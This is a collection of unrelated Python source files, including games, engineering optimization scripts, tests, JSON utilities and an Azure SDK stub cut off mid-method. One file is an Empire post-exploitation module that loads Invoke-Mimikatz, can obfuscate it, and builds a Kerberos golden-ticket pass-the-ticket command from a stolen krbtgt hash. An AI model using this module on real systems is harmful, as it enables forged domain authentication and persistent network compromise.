loss = actor_loss + critic_loss - entropy
# now perform update via gradient step
self.optimizer.zero_grad()
loss.mean().backward()
self.optimizer.step()
self.policy_old.load_state_dict(self.policy.state_dict()) |
py | 1a3313792be3c0e9bbda7730a9050e6fd26fb8b7 | from turtle import Turtle, Screen
import time
screen = Screen()
screen.bgcolor('black')
screen.title('My Snake Game')
screen.tracer(0)
starting_positions = [(0, 0), (-20, 0), (-40, 0)]  # 20x20 segments spaced one pace (20 px) apart
pace = 20
segments = []
for position in starting_positions:
new_segment = Turtle("square")
new_segment.color("white")
new_segment.penup()
new_segment.goto(position)
segments.append(new_segment)
game_is_on = True
while game_is_on:
screen.update()
time.sleep(0.1)
for seg_num in range(len(segments) - 1, 0, -1):
new_x = segments[seg_num - 1].xcor()
new_y = segments[seg_num - 1].ycor()
segments[seg_num].goto(new_x, new_y)
segments[0].forward(pace)
screen.exitonclick() |
py | 1a33165ccd7886e5b2733adde7dd686bca7c6403 | from __future__ import print_function
import pathlib
from builtins import object
from builtins import str
from typing import Dict
from empire.server.common import helpers
from empire.server.common.module_models import PydanticModule
from empire.server.database.models import Credential
from empire.server.utils import data_util
from empire.server.utils.module_util import handle_error_message
class Module(object):
@staticmethod
def generate(main_menu, module: PydanticModule, params: Dict, obfuscate: bool = False, obfuscation_command: str = ""):
# read in the common module source code
module_source = main_menu.installPath + "/data/module_source/credentials/Invoke-Mimikatz.ps1"
if main_menu.obfuscate:
obfuscated_module_source = module_source.replace("module_source", "obfuscated_module_source")
if pathlib.Path(obfuscated_module_source).is_file():
module_source = obfuscated_module_source
try:
with open(module_source, 'r') as f:
module_code = f.read()
except:
return handle_error_message("[!] Could not read module source path at: " + str(module_source))
if main_menu.obfuscate and not pathlib.Path(obfuscated_module_source).is_file():
script = data_util.obfuscate(installPath=main_menu.installPath, psScript=module_code, obfuscationCommand=main_menu.obfuscateCommand)
else:
script = module_code
# if a credential ID is specified, try to parse
cred_id = params["CredID"]
if cred_id != "":
if not main_menu.credentials.is_credential_valid(cred_id):
return handle_error_message("[!] CredID is invalid!")
cred: Credential = main_menu.credentials.get_credentials(cred_id)
if cred.username != "krbtgt":
return handle_error_message("[!] A krbtgt account must be used")
if cred.domain != "":
params["domain"] = cred.domain
if cred.sid != "":
params["sid"] = cred.sid
if cred.password != "":
params["krbtgt"] = cred.password
if params["krbtgt"] == "":
print(helpers.color("[!] krbtgt hash not specified"))
# build the golden ticket command
script_end = "Invoke-Mimikatz -Command '\"kerberos::golden"
for option,values in params.items():
if option.lower() != "agent" and option.lower() != "credid":
if values and values != '':
script_end += " /" + str(option) + ":" + str(values)
script_end += " /ptt\"'"
if main_menu.obfuscate:
script_end = data_util.obfuscate(main_menu.installPath, psScript=script_end, obfuscationCommand=main_menu.obfuscateCommand)
script += script_end
script = data_util.keyword_obfuscation(script)
return script
|
py | 1a3316c956aed07c34591ad62506aa44a006bb47 | import numpy as np
import openmdao.api as om
from mphys.multipoint import Multipoint
from mphys.scenario_aerostructural import ScenarioAeroStructural
from vlm_solver.mphys_vlm import VlmBuilder
from tacs.mphys import TacsBuilder
from mphys.solver_builders.mphys_meld import MeldBuilder
from struct_dv_components import StructDvMapper, SmoothnessEvaluatorGrid, struct_comps
import tacs_setup
check_derivs = False
class Top(Multipoint):
def setup(self):
# VLM
mesh_file = 'wing_VLM.dat'
mach = 0.85
aoa0 = 2.0
aoa1 = 5.0
q_inf = 12000.
vel = 178.
nu = 3.5E-5
aero_builder = VlmBuilder(mesh_file)
aero_builder.initialize(self.comm)
dvs = self.add_subsystem('dvs', om.IndepVarComp(), promotes=['*'])
dvs.add_output('aoa', val=[aoa0,aoa1], units='deg')
dvs.add_output('mach', mach)
dvs.add_output('q_inf', q_inf)
dvs.add_output('vel', vel)
dvs.add_output('nu', nu)
self.add_subsystem('mesh_aero',aero_builder.get_mesh_coordinate_subsystem())
# TACS
tacs_options = {'element_callback': tacs_setup.element_callback,
'problem_setup': tacs_setup.problem_setup,
'mesh_file': 'wingbox_Y_Z_flip.bdf'}
struct_builder = TacsBuilder(tacs_options)
struct_builder.initialize(self.comm)
self.add_subsystem('mesh_struct',struct_builder.get_mesh_coordinate_subsystem())
initial_thickness = 0.003
dvs.add_output('ribs', val=initial_thickness, shape = struct_comps['ribs'])
dvs.add_output('le_spar', val=initial_thickness, shape = struct_comps['le_spar'])
dvs.add_output('te_spar', val=initial_thickness, shape = struct_comps['te_spar'])
dvs.add_output('up_skin', val=initial_thickness, shape = struct_comps['up_skin'])
dvs.add_output('lo_skin', val=initial_thickness, shape = struct_comps['lo_skin'])
dvs.add_output('up_stringer', val=initial_thickness, shape = struct_comps['up_stringer'])
dvs.add_output('lo_stringer', val=initial_thickness, shape = struct_comps['lo_stringer'])
self.add_subsystem('struct_mapper',StructDvMapper(), promotes=['*'])
# MELD setup
isym = 1
ldxfer_builder = MeldBuilder(aero_builder, struct_builder, isym=isym)
ldxfer_builder.initialize(self.comm)
for iscen, scenario in enumerate(['cruise','maneuver']):
nonlinear_solver = om.NonlinearBlockGS(maxiter=25, iprint=2, use_aitken=True, rtol = 1E-14, atol=1E-14)
linear_solver = om.LinearBlockGS(maxiter=25, iprint=2, use_aitken=True, rtol = 1e-14, atol=1e-14)
self.mphys_add_scenario(scenario,ScenarioAeroStructural(aero_builder=aero_builder,
struct_builder=struct_builder,
ldxfer_builder=ldxfer_builder),
nonlinear_solver, linear_solver)
for discipline in ['aero','struct']:
self.mphys_connect_scenario_coordinate_source('mesh_%s' % discipline, scenario, discipline)
for dv in ['q_inf','vel','nu','mach','dv_struct']:
self.connect(dv, f'{scenario}.{dv}')
self.connect('aoa', f'{scenario}.aoa', src_indices=[iscen])
self.add_subsystem('le_spar_smoothness',SmoothnessEvaluatorGrid(columns=struct_comps['le_spar'],rows=1))
self.add_subsystem('te_spar_smoothness',SmoothnessEvaluatorGrid(columns=struct_comps['te_spar'],rows=1))
self.add_subsystem('up_skin_smoothness',SmoothnessEvaluatorGrid(columns=9,rows=struct_comps['up_skin']//9))
self.add_subsystem('lo_skin_smoothness',SmoothnessEvaluatorGrid(columns=9,rows=int(struct_comps['lo_skin']/9)))
self.connect('le_spar','le_spar_smoothness.thickness')
self.connect('te_spar','te_spar_smoothness.thickness')
self.connect('up_skin','up_skin_smoothness.thickness')
self.connect('lo_skin','lo_skin_smoothness.thickness')
################################################################################
# OpenMDAO setup
################################################################################
prob = om.Problem()
prob.model = Top()
model = prob.model
# optimization set up
prob.model.add_design_var('aoa',lower=-5*np.pi/180, upper=10*np.pi/180.0, ref=1.0, units='rad')
prob.model.add_design_var('ribs', lower=0.001, upper=0.020, ref=0.005)
prob.model.add_design_var('le_spar', lower=0.001, upper=0.020, ref=0.005)
prob.model.add_design_var('te_spar', lower=0.001, upper=0.020, ref=0.005)
prob.model.add_design_var('up_skin', lower=0.001, upper=0.020, ref=0.005)
prob.model.add_design_var('lo_skin', lower=0.001, upper=0.020, ref=0.005)
prob.model.add_design_var('up_stringer', lower=0.001, upper=0.020, ref=0.005)
prob.model.add_design_var('lo_stringer', lower=0.001, upper=0.020, ref=0.005)
prob.model.add_objective('cruise.mass',ref=1000.0)
prob.model.add_constraint('cruise.C_L',ref=1.0,equals=0.5)
prob.model.add_constraint('maneuver.C_L',ref=1.0,equals=0.9)
prob.model.add_constraint('maneuver.ks_vmfailure',ref=1.0, upper = 2.0/3.0)
prob.model.add_constraint('le_spar_smoothness.diff', ref=1e-3, upper = 0.0, linear=True)
prob.model.add_constraint('te_spar_smoothness.diff', ref=1e-3, upper = 0.0, linear=True)
prob.model.add_constraint('up_skin_smoothness.diff', ref=1e-3, upper = 0.0, linear=True)
prob.model.add_constraint('lo_skin_smoothness.diff', ref=1e-3, upper = 0.0, linear=True)
#prob.driver = om.ScipyOptimizeDriver(debug_print=['ln_cons','nl_cons','objs','totals'])
prob.driver = om.ScipyOptimizeDriver()
prob.driver.options['optimizer'] = 'SLSQP'
prob.driver.options['tol'] = 1e-8
prob.driver.options['disp'] = True
prob.driver.recording_options['includes'] = ['*']
prob.driver.recording_options['record_objectives'] = True
prob.driver.recording_options['record_constraints'] = True
prob.driver.recording_options['record_desvars'] = True
recorder = om.SqliteRecorder("cases.sql")
prob.driver.add_recorder(recorder)
prob.setup(mode='rev')
om.n2(prob, show_browser=False, outfile='mphys_as_vlm.html')
if check_derivs:
prob.run_model()
prob.check_totals(of=['cruise.mass','cruise.C_L','maneuver.ks_vmfailure'],
wrt=['aoa','ribs'])
else:
prob.run_driver()
cr = om.CaseReader('cases.sql')
driver_cases = cr.list_cases('driver')
matrix = np.zeros((len(driver_cases),4))
for i, case_id in enumerate(driver_cases):
matrix[i,0] = i
case = cr.get_case(case_id)
matrix[i,1] = case.get_objectives()['cruise.mass'][0]
matrix[i,2] = case.get_constraints()['cruise.C_L'][0]
matrix[i,3] = case.get_constraints()['maneuver.ks_vmfailure'][0]
np.savetxt('history.dat',matrix)
|
py | 1a3316d5d4b84e8855dcda39a3d4dce53c8d4901 | # You wish to buy video games from the famous online video game store Mist.
# Usually, all games are sold at the same price, p dollars. However, they are planning to have the seasonal
# Halloween Sale next month in which you can buy games at a cheaper price. Specifically, the first game you
# buy during the sale will be sold at p dollars, but every subsequent game you buy will be sold at exactly d dollars less than the
# cost of the previous one you bought. This will continue until the cost becomes less than or equal to m dollars,
# after which every game you buy will cost m dollars each.
# For example, if p = 20, d = 3 and m = 6 then the following are the
# costs of the first games you buy, in order:
# 20, 17, 14, 11, 8, 6, 6, 6, 6, 6, 6
# You have s dollars in your Mist wallet.
# How many games can you buy during the Halloween Sale?
# Input Format
# The first and only line of input contains four space-separated integers
# p, d, m and s.
#!/bin/python3
import math
import os
import random
import re
import sys
# Complete the howManyGames function below.
def howManyGames(p, d, m, s):
    # Return the number of games you can buy.
    # Games must be bought in order: the first costs p dollars, each subsequent
    # game costs d dollars less than the previous one, and the price never
    # drops below m dollars.
    prices_paid = []
    cost = p
    while sum(prices_paid) + cost <= s:
        prices_paid.append(cost)
        cost = max(m, cost - d)
    return len(prices_paid)
if __name__ == "__main__":
fptr = open(os.environ["OUTPUT_PATH"], "w")
pdms = input().split()
p = int(pdms[0]) # Games sold at same price
d = int(pdms[1]) # d dollars less than previous one
m = int(pdms[2]) # less less than m
s = int(pdms[3])
answer = howManyGames(p, d, m, s)
fptr.write(str(answer) + "\n")
fptr.close()
# Output Format
# Print a single line containing a single integer denoting the maximum number of
# games you can buy.
# Sample Input 0
# 20 3 6 80
# Sample Output 0
# 6
# Explanation 0
# We have p = 20, d = 3 and m = 6, the same as in the problem statement.
# We also have dollars s = 80. We can buy 6 games since they cost 20 + 17 + 14 + 11 + 8 + 6 = 76 dollars.
# However, we cannot buy a 7th game. Thus, the answer is 6.
# Sample Input 1
# 20 3 6 85
# Sample Output 1
# 7
# Explanation 1
# This is the same as the previous case, except this time we have s = 85
# dollars. This time, we can buy 7 games since they cost 20 + 17 + 14 + 11 + 8 + 6 + 6 = 82 dollars.
# However, we cannot buy an 8th game. Thus, the answer is 7.
|
py | 1a33178fc3898f1ff69e6c056a735b30dc06026b | import numpy as np
import random
import itertools
import scipy.misc
from PIL import Image
import matplotlib.pyplot as plt
class gameOb():
def __init__(self,coordinates,size,intensity,channel,reward,name):
self.x = coordinates[0]
self.y = coordinates[1]
self.size = size
self.intensity = intensity
self.channel = channel
self.reward = reward
self.name = name
class gameEnv():
def __init__(self,partial,size):
self.sizeX = size
self.sizeY = size
self.actions = 4
self.objects = []
self.partial = partial
a = self.reset()
plt.imshow(a,interpolation="nearest")
plt.axis("off")
def reset(self):
self.objects = []
hero = gameOb(self.newPosition(),1,1,2,None,'hero')
self.objects.append(hero)
bug = gameOb(self.newPosition(),1,1,1,1,'goal')
self.objects.append(bug)
hole = gameOb(self.newPosition(),1,1,0,-1,'fire')
self.objects.append(hole)
bug2 = gameOb(self.newPosition(),1,1,1,1,'goal')
self.objects.append(bug2)
hole2 = gameOb(self.newPosition(),1,1,0,-1,'fire')
self.objects.append(hole2)
bug3 = gameOb(self.newPosition(),1,1,1,1,'goal')
self.objects.append(bug3)
bug4 = gameOb(self.newPosition(),1,1,1,1,'goal')
self.objects.append(bug4)
state = self.renderEnv()
self.state = state
return state
def moveChar(self,direction):
# 0 - up, 1 - down, 2 - left, 3 - right
hero = self.objects[0]
heroX = hero.x
heroY = hero.y
penalize = 0.
if direction == 0 and hero.y >= 1:
hero.y -= 1
if direction == 1 and hero.y <= self.sizeY-2:
hero.y += 1
if direction == 2 and hero.x >= 1:
hero.x -= 1
if direction == 3 and hero.x <= self.sizeX-2:
hero.x += 1
if hero.x == heroX and hero.y == heroY:
penalize = 0.0
self.objects[0] = hero
return penalize
def newPosition(self):
iterables = [ range(self.sizeX), range(self.sizeY)]
points = []
for t in itertools.product(*iterables):
points.append(t)
currentPositions = []
for objectA in self.objects:
if (objectA.x,objectA.y) not in currentPositions:
currentPositions.append((objectA.x,objectA.y))
for pos in currentPositions:
points.remove(pos)
location = np.random.choice(range(len(points)),replace=False)
return points[location]
def checkGoal(self):
others = []
for obj in self.objects:
if obj.name == 'hero':
hero = obj
else:
others.append(obj)
ended = False
for other in others:
if hero.x == other.x and hero.y == other.y:
self.objects.remove(other)
if other.reward == 1:
self.objects.append(gameOb(self.newPosition(),1,1,1,1,'goal'))
else:
self.objects.append(gameOb(self.newPosition(),1,1,0,-1,'fire'))
return other.reward,False
if ended == False:
return 0.0,False
def renderEnv(self):
#a = np.zeros([self.sizeY,self.sizeX,3])
a = np.ones([self.sizeY+2,self.sizeX+2,3])
a[1:-1,1:-1,:] = 0
hero = None
for item in self.objects:
a[item.y+1:item.y+item.size+1,item.x+1:item.x+item.size+1,item.channel] = item.intensity
if item.name == 'hero':
hero = item
if self.partial == True:
a = a[hero.y:hero.y+3,hero.x:hero.x+3,:]
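        # Each colour channel is then upscaled to 84x84 with nearest-neighbour resampling,
        # presumably to match the fixed input resolution expected by the downstream network.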
b = Image.fromarray(np.uint8(a[:,:,0]*255), mode="L").resize((84,84), resample=Image.NEAREST)
c = Image.fromarray(np.uint8(a[:,:,1]*255), mode="L").resize((84,84), resample=Image.NEAREST)
d = Image.fromarray(np.uint8(a[:,:,2]*255), mode="L").resize((84,84), resample=Image.NEAREST)
a = np.stack([b,c,d],axis=2)
return a
def step(self,action):
penalty = self.moveChar(action)
reward,done = self.checkGoal()
state = self.renderEnv()
if reward == None:
print(done)
print(reward)
print(penalty)
return state,(reward+penalty),done
else:
return state,(reward+penalty),done |
py | 1a331806e7f444969a4081e8c2515495508167c8 | # MIT License
#
# Copyright (c) 2015-2020 Iakiv Kramarenko
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from selene.bys import by, by_css, by_name, by_link_text, by_partial_link_text, by_xpath, following_sibling, parent, \
first_child, by_text, by_partial_text, escape_text_quotes_for_xpath
def test_by_css():
assert by("a") == ('css selector', 'a')
assert by_css("span") == ('css selector', 'span')
def test_by_name():
assert by_name("test") == ('name', 'test')
def test_by_link_text():
assert by_link_text("text") == ('link text', 'text')
def test_by_partial_link_text():
assert by_partial_link_text("text") == ("partial link text", "text")
def test_by_xpath():
assert by_xpath("//a") == ('xpath', "//a")
def test_by_following_sibling():
assert following_sibling() == ("xpath", './following-sibling::*')
def test_by_parent():
assert parent() == ("xpath", "..")
def test_first_child():
assert first_child() == ("xpath", "./*[1]")
def test_by_text():
assert by_text("test") == ("xpath", './/*[text()[normalize-space(.) = concat("", "test")]]')
def test_by_partial_text():
assert by_partial_text("text") == ("xpath", './/*[text()[contains(normalize-space(.), concat("", "text"))]]')
def test_by_escape_text_quotes_for_xpath():
assert escape_text_quotes_for_xpath('test') == 'concat("", "test")'
|
py | 1a33188bfdcc8a569a5b6ef34c1ecc781bc42299 | # -*- coding: utf-8 -*-
"""
JSON encoder/decoder adapted for use with Google App Engine NDB.
Usage:
import ndb_json
# Serialize an ndb.Query into an array of JSON objects.
query = models.MyModel.query()
query_json = ndb_json.dumps(query)
# Convert into a list of Python dictionaries.
query_dicts = ndb_json.loads(query_json)
# Serialize an ndb.Model instance into a JSON object.
entity = query.get()
entity_json = ndb_json.dumps(entity)
# Convert into a Python dictionary.
entity_dict = ndb_json.loads(entity_json)
Dependencies:
- dateutil: https://pypi.python.org/pypi/python-dateutil
"""
__author__ = 'Eric Higgins'
__copyright__ = 'Copyright 2013-2016, Eric Higgins'
__email__ = '[email protected]'
import base64
import datetime
import json
import time
import types
import dateutil.parser
from google.appengine.ext import ndb
__all__ = (
'dump',
'dumps',
'loads',
'NdbDecoder',
'NdbEncoder',
)
def encode_model(obj):
"""Encode objects like ndb.Model which have a `.to_dict()` method."""
obj_dict = obj.to_dict()
for key, val in obj_dict.iteritems():
if isinstance(val, types.StringType):
try:
unicode(val)
except UnicodeDecodeError:
# Encode binary strings (blobs) to base64.
obj_dict[key] = base64.b64encode(val)
return obj_dict
def encode_generator(obj):
"""Encode generator-like objects, such as ndb.Query."""
return list(obj)
def encode_key_as_entity(obj):
"""Get the Entity from the ndb.Key for further encoding."""
# NOTE(erichiggins): Potentially poor performance for Models w/ many KeyProperty properties.
# NOTE(ronufryk): Potentially can cause circular references and "RuntimeError: maximum recursion depth exceeded"
return obj.get_async()
# Alias for backward-compatibility
encode_key = encode_key_as_entity
def encode_key_as_pair(obj):
"""Get the ndb.Key as a tuple of (kind, id) pairs."""
return obj.pairs()
def encode_key_as_urlsafe(obj):
"""Get the ndb.Key as URL-safe base64-encoded string."""
return obj.urlsafe()
def encode_future(obj):
"""Encode an ndb.Future instance."""
return obj.get_result()
def encode_datetime(obj):
"""Encode a datetime.datetime or datetime.date object as an ISO 8601 format string."""
# Reformat the date slightly for better JS compatibility.
# Offset-naive dates need 'Z' appended for JS.
# datetime.date objects don't have or need tzinfo, so don't append 'Z'.
zone = '' if getattr(obj, 'tzinfo', True) else 'Z'
return obj.isoformat() + zone
def encode_complex(obj):
"""Convert a complex number object into a list containing the real and imaginary values."""
return [obj.real, obj.imag]
def encode_basevalue(obj):
"""Retrieve the actual value from a ndb.model._BaseValue.
This is a convenience function to assist with the following issue:
https://code.google.com/p/appengine-ndb-experiment/issues/detail?id=208
"""
return obj.b_val
NDB_TYPE_ENCODING = {
ndb.MetaModel: encode_model,
ndb.Query: encode_generator,
ndb.QueryIterator: encode_generator,
ndb.Key: encode_key_as_entity,
ndb.Future: encode_future,
datetime.date: encode_datetime,
datetime.datetime: encode_datetime,
time.struct_time: encode_generator,
types.ComplexType: encode_complex,
ndb.model._BaseValue: encode_basevalue,
}
# Sort the types so any iteration is in a deterministic order
NDB_TYPES = sorted(NDB_TYPE_ENCODING.keys(), key=lambda t: t.__name__)
class NdbDecoder(json.JSONDecoder):
"""Extend the JSON decoder to add support for datetime objects."""
def __init__(self, **kwargs):
"""Override the default __init__ in order to specify our own parameters."""
json.JSONDecoder.__init__(self, object_hook=self.object_hook_handler, **kwargs)
def object_hook_handler(self, val):
"""Handles decoding of nested date strings."""
return {k: self.decode_date(v) for k, v in val.iteritems()}
def decode_date(self, val):
"""Tries to decode strings that look like dates into datetime objects."""
if isinstance(val, basestring) and val.count('-') == 2 and len(val) > 9:
try:
dt = dateutil.parser.parse(val)
# Check for UTC.
if val.endswith(('+00:00', '-00:00', 'Z')):
# Then remove tzinfo for gae, which is offset-naive.
dt = dt.replace(tzinfo=None)
return dt
except (TypeError, ValueError):
pass
return val
def decode(self, val):
"""Override of the default decode method that also uses decode_date."""
# First try the date decoder.
new_val = self.decode_date(val)
if val != new_val:
return new_val
# Fall back to the default decoder.
return json.JSONDecoder.decode(self, val)
class NdbEncoder(json.JSONEncoder):
"""Extend the JSON encoder to add support for NDB Models."""
def __init__(self, **kwargs):
self._ndb_type_encoding = NDB_TYPE_ENCODING.copy()
keys_as_entities = kwargs.pop('ndb_keys_as_entities', False)
keys_as_pairs = kwargs.pop('ndb_keys_as_pairs', False)
keys_as_urlsafe = kwargs.pop('ndb_keys_as_urlsafe', False)
# Validate that only one of three flags is True
if ((keys_as_entities and keys_as_pairs)
or (keys_as_entities and keys_as_urlsafe)
or (keys_as_pairs and keys_as_urlsafe)):
raise ValueError('Only one of arguments ndb_keys_as_entities, ndb_keys_as_pairs, ndb_keys_as_urlsafe can be True')
if keys_as_pairs:
self._ndb_type_encoding[ndb.Key] = encode_key_as_pair
elif keys_as_urlsafe:
self._ndb_type_encoding[ndb.Key] = encode_key_as_urlsafe
else:
self._ndb_type_encoding[ndb.Key] = encode_key_as_entity
json.JSONEncoder.__init__(self, **kwargs)
def default(self, obj):
"""Overriding the default JSONEncoder.default for NDB support."""
obj_type = type(obj)
# NDB Models return a repr to calls from type().
if obj_type not in self._ndb_type_encoding:
if hasattr(obj, '__metaclass__'):
obj_type = obj.__metaclass__
else:
# Try to encode subclasses of types
for ndb_type in NDB_TYPES:
if isinstance(obj, ndb_type):
obj_type = ndb_type
break
fn = self._ndb_type_encoding.get(obj_type)
if fn:
return fn(obj)
return json.JSONEncoder.default(self, obj)
def dumps(ndb_model, **kwargs):
"""Custom json dumps using the custom encoder above."""
return NdbEncoder(**kwargs).encode(ndb_model)
def dump(ndb_model, fp, **kwargs):
"""Custom json dump using the custom encoder above."""
for chunk in NdbEncoder(**kwargs).iterencode(ndb_model):
fp.write(chunk)
def loads(json_str, **kwargs):
"""Custom json loads function that converts datetime strings."""
return NdbDecoder(**kwargs).decode(json_str)
|
py | 1a331b11e0db92c55c044fe675728d7ab1258e1d | ################################################################################
# Copyright (C) 2019 Advanced Micro Devices, Inc. All rights reserved.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell cop-
# ies of the Software, and to permit persons to whom the Software is furnished
# to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IM-
# PLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS
# FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR
# COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER
# IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNE-
# CTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
################################################################################
from __future__ import print_function
import pytest
from Tensile.DataType import DataType
def test_init_single():
expected = DataType('S')
assert DataType('single') == expected
assert DataType('Float') == expected
assert DataType('tensileDataTypeFloat') == expected
def test_init_double():
expected = DataType('D')
assert DataType('double') == expected
assert DataType('Double') == expected
assert DataType('tensileDataTypeDouble') == expected
def test_init_complexSingle():
expected = DataType('C')
assert DataType('complexSingle') == expected
assert DataType('complexFloat') == expected
assert DataType('tensileDataTypeComplexFloat') == expected
def test_init_complexDouble():
expected = DataType('Z')
assert DataType('complexDouble') == expected
    assert DataType('ComplexDouble') == expected
assert DataType('tensileDataTypeComplexDouble') == expected
def test_init_half():
expected = DataType('H')
assert DataType('half') == expected
assert DataType('Half') == expected
assert DataType('tensileDataTypeHalf') == expected
def test_init_i8():
expected = DataType('4xi8')
assert DataType('int8x4') == expected
assert DataType('Int8x4') == expected
assert DataType('tensileDataTypeInt8x4') == expected
def test_init_i32():
expected = DataType('I')
assert DataType('int32') == expected
assert DataType('Int32') == expected
assert DataType('tensileDataTypeInt32') == expected
def test_single():
obj = DataType(0)
assert obj.toChar() == 'S'
assert obj.toName() == 'single'
assert obj.toEnum() == 'Float'
assert obj.toOpenCL() == 'float'
assert obj.toHIP() == 'float'
assert obj.toDevice("") == 'float'
assert obj.toCpp() == 'float'
assert obj.getLibString() == 'tensileDataTypeFloat'
assert obj.numBytes() == 4
assert obj.isReal()
def test_double():
obj = DataType(1)
assert obj.toChar() == 'D'
assert obj.toName() == 'double'
assert obj.toEnum() == 'Double'
assert obj.toOpenCL() == 'double'
assert obj.toHIP() == 'double'
assert obj.toDevice("") == 'double'
assert obj.toCpp() == 'double'
assert obj.getLibString() == 'tensileDataTypeDouble'
assert obj.numBytes() == 8
assert obj.isReal()
def test_complexSingle():
obj = DataType(2)
assert obj.toChar() == 'C'
assert obj.toName() == 'complexSingle'
assert obj.toEnum() == 'ComplexFloat'
assert obj.toOpenCL() == 'float2'
assert obj.toHIP() == 'TensileComplexFloat'
assert obj.toDevice("") == 'TensileComplexFloat'
assert obj.toCpp() == 'TensileComplexFloat'
assert obj.getLibString() == 'tensileDataTypeComplexFloat'
assert obj.numBytes() == 8
assert not obj.isReal()
def test_complexDouble():
obj = DataType(3)
assert obj.toChar() == 'Z'
assert obj.toName() == 'complexDouble'
assert obj.toEnum() == 'ComplexDouble'
assert obj.toOpenCL() == 'double2'
assert obj.toHIP() == 'TensileComplexDouble'
assert obj.toDevice("") == 'TensileComplexDouble'
assert obj.toCpp() == 'TensileComplexDouble'
assert obj.getLibString() == 'tensileDataTypeComplexDouble'
assert obj.numBytes() == 16
assert not obj.isReal()
def test_half():
obj = DataType(4)
assert obj.toChar() == 'H'
assert obj.toName() == 'half'
assert obj.toEnum() == 'Half'
assert obj.toOpenCL() == 'ERROR'
assert obj.toHIP() == 'tensile_half'
assert obj.toDevice("OCL") == 'ERROR'
assert obj.toDevice("") == 'tensile_half'
assert obj.toCpp() == 'TensileHalf'
assert obj.getLibString() == 'tensileDataTypeHalf'
assert obj.numBytes() == 2
assert obj.isReal()
def test_int8():
obj = DataType(5)
assert obj.toChar() == '4xi8'
assert obj.toName() == 'int8x4'
assert obj.toEnum() == 'Int8x4'
assert obj.toOpenCL() == 'ERROR'
assert obj.toHIP() == 'uint32_t'
assert obj.toDevice("OCL") == 'ERROR'
assert obj.toDevice("") == 'uint32_t'
assert obj.toCpp() == 'TensileInt8x4'
assert obj.getLibString() == 'tensileDataTypeInt8x4'
assert obj.numBytes() == 4
assert obj.isReal()
def test_int32():
obj = DataType(6)
assert obj.toChar() == 'I'
assert obj.toName() == 'int32'
assert obj.toEnum() == 'Int32'
assert obj.toOpenCL() == 'ERROR'
assert obj.toHIP() == 'int32_t'
assert obj.toDevice("OCL") == 'ERROR'
assert obj.toDevice("") == 'int32_t'
assert obj.toCpp() == 'TensileInt32'
assert obj.getLibString() == 'tensileDataTypeInt32'
assert obj.numBytes() == 4
assert obj.isReal()
def test_cmp():
assert DataType('single') == DataType('S')
assert not DataType('S') != DataType(0)
assert DataType('Float') < DataType('Double')
assert not DataType('tensileDataTypeFloat') > DataType('Z')
assert DataType('half') >= DataType('ComplexFloat')
assert not DataType('int32') <= DataType('tensileDataTypeInt8x4')
def test_bounds():
with pytest.raises(Exception):
DataType(10)
|
py | 1a331b6e0fcce1551964b2853b33766abe956cf0 | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import Any, Callable, Dict, Generic, Optional, TypeVar
import warnings
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse, HttpRequest
from azure.mgmt.core.exceptions import ARMErrorFormat
from ... import models
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class SignUpSettingsOperations:
"""SignUpSettingsOperations async operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.apimanagement.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = models
def __init__(self, client, config, serializer, deserializer) -> None:
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
async def get_entity_tag(
self,
resource_group_name: str,
service_name: str,
**kwargs
) -> bool:
"""Gets the entity state (Etag) version of the SignUpSettings.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param service_name: The name of the API Management service.
:type service_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: bool, or the result of cls(response)
:rtype: bool
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-06-01-preview"
accept = "application/json"
# Construct URL
